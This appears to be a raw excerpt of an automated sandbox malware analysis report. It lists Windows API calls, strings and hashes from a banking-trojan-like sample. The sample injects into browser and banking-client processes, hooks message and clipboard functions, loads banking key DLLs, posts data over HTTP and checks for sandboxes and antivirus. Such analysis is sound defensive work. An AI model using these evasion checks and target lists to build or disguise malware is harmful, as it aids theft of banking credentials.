                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BBBC50,00000000,00000000,00000000), ref: 02BC7745
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC775D
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC776E
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00007FD0,00000000,00000000,00000000), ref: 02BC7783
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC779B
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC77AC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Create$Thread$Information$Close$Security$Descriptor$AddressProc$HeapProcessUser$AdminCriticalCurrentFreeInitializeModuleMutexPathSection$BackslashCommandConvertFileInfoLibraryLineLoadLocalNameNamedSaclStringVolume_snprintfmemset$DesktopDirectoryEnvironmentExceptionFolderHandlerMultipleObjectObjectsOpenQuerySleepSystemValidateValueVariableVectoredWaitWindowslstrcmpi
                                                                                                                                                                                                                • String ID: --no-sandbox$ --no-sandbox$9E938C06a$9E938F4Aa$9e93884aa$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$S:(ML;;NRNWNX;;;LW)$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\frd.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC5741
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7556F550,75497390,75570A60), ref: 02BC5757
                                                                                                                                                                                                                • RtlAddVectoredExceptionHandler.NTDLL(00000001,02BB3A20), ref: 02BC5764
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BC577F
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02BC5799
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC57B1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC57C2
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02BFFB50), ref: 02BC57D3
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC57E9
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02BC57FB
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC581A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02BC5828
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02BC5844
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02BC5860
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02BFFB38), ref: 02BC587B
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02BC5882
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02BC5892
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,02BB79E0,02C09E88), ref: 02BC58A8
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BC58C3
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BC58D8
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(00000000), ref: 02BC58DF
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,9e93884aa), ref: 02BC58F1
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC590B
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02BC591B
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,02BBBB50,02BFEB74), ref: 02BC5931
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BC5940
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BC5955
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(00000000), ref: 02BC595C
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,9e93884aa), ref: 02BC596E
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,java), ref: 02BC59A2
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,.exe), ref: 02BC59B4
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,frd.exe), ref: 02BC59CA
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02BC59E1
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02BC59EF
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02BC5A0B
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02BC5A27
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02BFFB20), ref: 02BC5A42
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02BC5A6F
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02BC5A7B
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02BC5A9A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02BC5AA6
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02BC5AC5
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02BC5AD1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
                                                                                                                                                                                                                • String ID: .exe$9e93884aa$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$frd.exe$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4AED
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02BC4B27
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02BC4B2E
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4B3E
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000004,?,?,00000000), ref: 02BC4B5D
                                                                                                                                                                                                                • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02BC4BC2
                                                                                                                                                                                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02BC4BE1
                                                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02BC4C19
                                                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02BC4C4A
                                                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02BC4C5E
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BC4C7C
                                                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02BC4C94
                                                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02BC4CAA
                                                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02BC4CCD
                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02BC4D05
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BC4D2C
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,00000004,00000000,?,?,00000000), ref: 02BC4D4D
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02BC4D66
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 02BC4D70
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00001010,?,?,00000000), ref: 02BC4D83
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,00000000), ref: 02BC4D86
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4D9E
                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02BC4DBB
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 02BC4DDC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4DEC
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4DFB
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E0B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E14
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E1B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E2C
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,?,?,?,?,00000000), ref: 02BC4E33
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E41
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E44
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E51
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E54
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000004,?,?,00000000), ref: 02BC4E6A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 02BC4E7B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • S:(ML;;NRNWNX;;;LW), xrefs: 02BC4D27
                                                                                                                                                                                                                • GET, xrefs: 02BC4BF5
                                                                                                                                                                                                                • Referer: http://www.google.com, xrefs: 02BC4C58
                                                                                                                                                                                                                • HTTP/1.0, xrefs: 02BC4C11
                                                                                                                                                                                                                • POST, xrefs: 02BC4BFE, 02BC4C17
                                                                                                                                                                                                                • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02BC4C6B
                                                                                                                                                                                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 02BC4C42
                                                                                                                                                                                                                • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02BC4BBD
                                                                                                                                                                                                                • 3d11e105700a76c9, xrefs: 02BC4C66
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FileHttpProcess$Request$Security$DescriptorFreeHeadersInternetmemset$HandleInfoOpenValidate$AllocAllocateCloseConnectConvertCreateInformationLocalLockNamedPointerQueryReadSaclSendStringUnlockWrite_snprintfmemcpy
                                                                                                                                                                                                                • String ID: 3d11e105700a76c9$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 1986934500-133595173
                                                                                                                                                                                                                • Opcode ID: dcb0f9743e80802f877bbcd23ef69d44cea1b355611397f996dda56557d589ba
                                                                                                                                                                                                                • Instruction ID: 93a8a5890c099451beed93aa5bb10ce8666d4c7aed195e4dba8c807d2c5e8bcd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcb0f9743e80802f877bbcd23ef69d44cea1b355611397f996dda56557d589ba
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2ED1B171A40215ABEB609FA49C59FAF7B7CEF08754F204598FA05E7180DBB4DA10CBA4

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                                  • Part of subcall function 00403A20: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                  • Part of subcall function 00403A20: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                  • Part of subcall function 00403A20: RegCloseKey.KERNEL32(?), ref: 00403A93
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                  • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                                • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                                • String ID: IsWow64Process$PnEw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                                • API String ID: 3353599405-2298154373
                                                                                                                                                                                                                • Opcode ID: 21102898d184598221165a6fef4bec34bd79f3d1470297f61f252bfca23f0e31
                                                                                                                                                                                                                • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21102898d184598221165a6fef4bec34bd79f3d1470297f61f252bfca23f0e31
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD

APIs
• VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB3ACA
• VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,?), ref: 02BB3B33
• SymSetOptions.DBGHELP(00000006), ref: 02BB3B48
• GetCurrentProcess.KERNEL32(00000000,00000001), ref: 02BB3B58
• SymInitialize.DBGHELP(00000000), ref: 02BB3B5B
• GetCurrentProcess.KERNEL32(?,00000000), ref: 02BB3B9A
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 02BB3C27
• _snprintf.MSVCRT ref: 02BB3C47
• GetCurrentThread.KERNEL32 ref: 02BB3CD4
• ZwQueryInformationThread.NTDLL(00000000), ref: 02BB3CDB
• GetCurrentProcess.KERNEL32(?,00000000), ref: 02BB3D20
  • Part of subcall function 02BD5460: VirtualQuery.KERNEL32(02BD5460,?,0000001C), ref: 02BD5488
Strings
• DEBUG, xrefs: 02BB404D
• debug_%s_%s.log, xrefs: 02BB3ED4
• csm, xrefs: 02BB3A45
• main, xrefs: 02BB3BEE
• HH;mm;ss, xrefs: 02BB3EB2
• ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 02BB3C3E
• CallStack:, xrefs: 02BB3D58
• ThreadStart = , xrefs: 02BB3CF8
• scr.bmp, xrefs: 02BB3FF8
• Self exception = TRUE, xrefs: 02BB3C8D
• sysinfo.log, xrefs: 02BB3F78
• ExceptionAddress = , xrefs: 02BB3B68
• dd;MMM;yyyy, xrefs: 02BB3E8B
Memory Dump Source
• Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
Yara matches
Similarity
• API ID: Current$ProcessQueryVirtual$Thread$AllocErrorInformationInitializeLastOptions_snprintf
• String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log

APIs
• RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
• RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
• RegCloseKey.KERNEL32(?), ref: 00403A93
• RegCloseKey.ADVAPI32(?), ref: 00403A9F
• GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
• CharUpperA.USER32(?), ref: 00403AE6
• strstr.MSVCRT ref: 00403AFE
• strstr.MSVCRT ref: 00403B17
• strstr.MSVCRT ref: 00403B30
• GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
• GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
• StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
• StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
• StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
Strings
Memory Dump Source
• Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
• String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
Yara matches
Similarity
• API ID: ExitThread$Startupsocket
• String ID: login$pass

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02BC78B4
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: Process32First.KERNEL32(00000000,?), ref: 02BC78D9
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02BC78FD
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02BC7917
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: EnterCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC793B
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02BC7941
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02BC7948
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: LeaveCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC7977
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: Process32Next.KERNEL32(00000000,00000128), ref: 02BC798B
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02BC79A5
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: CloseHandle.KERNEL32(00000000,?,00000000), ref: 02BC79B6
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,000002E8), ref: 02BC7A34
                                                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02BC7A58
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC7A82
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7A94
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB80), ref: 02BC7A9F
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7AC4
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02BC7B2B
                                                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02BC7B4C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC7B70
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7B82
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB80), ref: 02BC7B8D
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7BB8
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC7C06
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC7C51
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB80,?,?), ref: 02BC7C90
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02BC7C9A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC7CA1
                                                                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 02BC7DB5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CriticalProcessSection$Handle$EnterHeap$CloseInformationLeave$OpenProcess32QueryTimesVirtual$AllocAllocateCreateCurrentFirstNextSleepSnapshotToolhelp32
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3323447582-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
